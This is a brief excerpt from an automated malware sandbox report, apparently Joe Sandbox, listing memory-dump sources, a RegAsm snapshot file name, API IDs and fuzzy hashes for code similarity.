• Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F

APIs

Memory Dump Source
• Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
• Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
• Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
• Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49